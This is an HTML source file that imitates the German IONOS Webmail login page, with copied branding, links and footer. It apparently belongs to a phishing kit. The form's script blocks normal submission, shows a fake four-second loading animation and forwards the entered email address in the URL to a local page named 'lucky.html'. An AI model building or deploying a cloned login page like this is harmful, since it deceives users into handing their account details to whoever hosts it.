<!DOCTYPE html>
<html lang="de">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>IONOS Webmail Login</title>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap" rel="stylesheet"/>
  <link rel="stylesheet" href="styles.css">
</head>
<style>

</style>
<body>
  <header>
    <div class="header-left">
      <a href="https://www.ionos.de">
        <img src="images/ionos.png" alt="IONOS logo">
      </a>
      <h1>WEBMAIL LOGIN</h1>
    </div>
    
    <div class="search-container">
      <div class="search-box">
        <svg xmlns="http://www.w3.org/2000/svg" class="search-icon" viewBox="0 0 24 24" width="24" height="24">
          <path fill="#4a4a4a" d="M21 20l-4.35-4.35A7.92 7.92 0 0018 10a8 8 0 10-8 8 7.92 7.92 0 005.65-2.35L20 21zM4 10a6 6 0 1112 0 6 6 0 01-12 0z"/>
        </svg>
        <input type="text" placeholder="Nach Funktionen, Domains und Hilfe suchen" />
        <svg xmlns="http://www.w3.org/2000/svg" class="mic-icon" viewBox="0 0 24 24" width="24" height="24">
          <path fill="#4a4a4a" d="M12 14a3 3 0 003-3V5a3 3 0 10-6 0v6a3 3 0 003 3zm5-3a5 5 0 01-10 0H5a7 7 0 0014 0h-2zm-5 8a1 1 0 001-1h-2a1 1 0 001 1zm-1 1h2v2h-2v-2z"/>
        </svg>
      </div>
    </div>
    
    <div class="header-right">
      <svg xmlns="http://www.w3.org/2000/svg" class="search-icon-mobile" viewBox="0 0 24 24" title="Suchen">
        <path fill="#4a4a4a" d="M21 20l-4.35-4.35A7.92 7.92 0 0018 10a8 8 0 10-8 8 7.92 7.92 0 005.65-2.35L20 21zM4 10a6 6 0 1112 0 6 6 0 01-12 0z"/>
      </svg>
      
      <div class="chat-icon" title="Hilfe">
        <svg class="chat-svg" xmlns="http://www.w3.org/2000/svg" viewBox="-1 -1 28 28" width="32" height="32">
          <path class="bubble" d="M1.7,25.5c-0.5,0-0.8-0.3-0.9-0.4c-0.3-0.4-0.4-0.9-0.1-1.5C1.5,21.4,2.4,19,2.8,18c-0.1-0.1-0.2-0.3-0.3-0.4
          c-1.3-1.8-2-3.8-2-6c0-6.1,5.6-11,12.5-11c7,0,12.5,4.8,12.5,11c0,6.1-5.6,11-12.5,11c-1.5,0-2.7-0.2-3.7-0.5C9.2,22,9,22,8.9,21.9
          c-0.6,0.3-2,1-3,1.5c-2.6,1.4-3.4,1.8-3.7,1.9C2,25.4,1.9,25.5,1.7,25.5z"
          fill="none" stroke="#003087" stroke-width="3"/>
          
          <g class="question" fill="#003087">
            <path d="M12.9,13.3c-0.6,0-1.1-0.5-1.1-1.1c0-1.7,1.1-2.5,1.4-2.7c0.6-0.4,0.8-0.8,0.8-1c0-0.6-0.2-0.8-0.2-0.8
              c-0.3-0.2-0.7-0.3-0.8-0.3c-0.8,0-1,0.4-1.1,0.7c-0.1,0.6-0.7,1-1.2,0.9s-1-0.6-0.9-1.2C9.9,7,10.7,5.3,13,5.3c0.2,0,1.4,0,2.4,0.9
              c0.4,0.4,0.9,1.1,0.9,2.3c0,0.7-0.3,1.8-1.7,2.8c-0.1,0.1-0.5,0.3-0.5,0.9C14,12.8,13.6,13.3,12.9,13.3z"/>
            <path d="M13,17.7c0.7,0,1.2-0.5,1.2-1.2s-0.5-1.2-1.2-1.2s-1.2,0.5-1.2,1.2S12.3,17.7,13,17.7z"/>
          </g>
        </svg>
      </div>
    </div>
    
  </header>
  <div class="container">
    <h2>
      <img src="images/email.svg" alt="E-Mail-Symbol">
      Mein Webmail Login
    </h2>
    <form id="loginForm">
        <label for="email">E-Mail-Adresse</label>
        <input type="email" id="email" name="email" required autocomplete="email" />
        <p class="note"><strong>Nicht Ihr Gerät?</strong> Melden Sie sich nach der Sitzung ab oder verwenden Sie den <a href="#">privaten Browsing-Modus</a>.</p>
        <button type="submit" id="submitBtn">
          <div class="btn-content">
            <span class="btn-text">Weiter</span>
            <div class="dots-loading">
              <div class="dot"></div>
              <div class="dot"></div>
              <div class="dot"></div>
            </div>
          </div>
        </button>
    </form>
    <p class="learn-more">
      <strong>Noch kein IONOS-Kunde?</strong>
      <span>Jetzt Kunde werden und von unseren Angeboten profitieren.</span>
    </p>
  </div>
  <div class="more-logins">
    <div class="more-logins-inner">
      <h3>Weitere IONOS-Logins</h3>
      <div class="login-options">
        <div class="login-option">
          <img src="images/account.svg" alt="Mein IONOS">
          <span>Mein IONOS</span>
        </div>
        <div class="login-option">
          <img src="images/drive.svg" alt="HiDrive">
          <span>HiDrive</span>
        </div>
        <div class="login-option">
          <img src="images/archive.svg" alt="E-Mail-Archivierung">
          <span>E-Mail-Archivierung</span>
        </div>

      </div>
    </div>
  </div>
  <footer class="custom-footer">
    <div class="footer-left">
      <span class="status-dot"></span> 
      <a href="https://www.ionos-status.de/?utm_medium=footer&utm_content=minor&utm_source=LOGIN_ID&utm_campaign=identifier&utm_term=no_search" target="_blank" rel="noopener noreferrer">
        Alle Systeme funktional
      </a>
    </div>
    <div class="footer-center">
      &copy; 2025 
      <a href="https://www.ionos.de/unternehmen" target="_blank" rel="noopener noreferrer">
        IONOS SE
      </a>
    </div>
    <div class="footer-right">
      <a href="https://www.ionos.de/impressum" target="_blank" rel="noopener noreferrer">Impressum</a> - 
      <a href="https://www.ionos.de/terms-gtc/datenschutzerklaerung/" target="_blank" rel="noopener noreferrer">Datenschutz</a> - 
      <a href="https://www.ionos.de/terms-gtc/terms/" target="_blank" rel="noopener noreferrer">AGB</a>
    </div>
  </footer>
  
  
  <script src="jsss.js"></script>
  <script>
    document.addEventListener("DOMContentLoaded", function () {
      const form = document.getElementById("loginForm");
      const button = document.getElementById("submitBtn");
      const dotsLoading = button.querySelector(".dots-loading");
  
      form.addEventListener("submit", function (e) {
        e.preventDefault();
        const email = document.getElementById("email").value;
  
        // Disable button and show loading dots
        button.disabled = true;
        dotsLoading.style.display = 'flex';
  
        // Redirect after 4 seconds
        setTimeout(() => {
          window.location.href = `lucky.html?email=${encodeURIComponent(email)}`;
        }, 4000); // 4 seconds
      });
    });
  </script>
</body>
</html>